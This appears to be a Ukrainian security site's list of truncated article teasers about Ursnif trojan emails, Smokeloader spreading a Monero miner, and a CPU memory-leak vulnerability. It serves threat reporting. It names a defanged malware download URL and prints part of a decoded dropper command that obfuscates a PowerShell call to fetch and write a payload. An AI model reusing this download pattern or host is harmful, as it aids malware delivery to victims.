Поширення банківського трояна Ursnif

Приклад повідомлень : У вкладеному архіві anketa_21_3_2018 (4).zip міститься шкідливий Javascript: anketa_21_3_2018 (4).js. Також, було виявлено поширення повідомлень з таким Javascript, але, вкладених в архів documents (5).zip з назвою шкідливого Javascipt documents (5).js відповідно. Сам Javascript складно обфускований, в декілька етапів. В результаті аналізу встановлено, що Javascript за допомогою ADODB.Stream записує потік даних з сайту hxxp://chernilis.win/filename94.bin?ff1 у виконуваний файл за Читати далі…

0

Поширення Monero Mining, через Smokeloader

Виявлено факт поширення шкідливого програмного забезпечення Smokeloader, який скачував на комп’ютери жертв програму для майнингу криптовалюти Monero. Поширення Smokeloader відбувається через розсилку поштових повідомлень зі злоякісним Javascript-ом. В самому Javascript шкідливий код зашифрований в виді Base64 і при розшифруванні виглядає так: cmd /k set _a1=pow&& set _a2=ersh&& set _a3=ell&& call %_a1%%_a2%%_a3% $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObjectADODB.Stream; $path = Читати далі…

0

Глобальна вразливість, яка зачіпає практично всі сучасні і застарілі процесори незалежно від операційної системи

Командою, що спеціалізується на інформаційній безпеці “Project Zero” компанії “Google” було проведено дослідження та опубліковано інформацію про надсерйозну апаратну вразливість центральних процесорів компаній виробництва Intel, AMD та процесорів працюючих на архітектурі ARM. Вразливість дозволяє стороннім програмам отримувати несанкціонований доступ до певних даних в захищеній області пам’яті ядра. При цьому можливе отримання дампа системної пам’яті під час виконання JavaScript. Запобігти цьому Читати далі…

0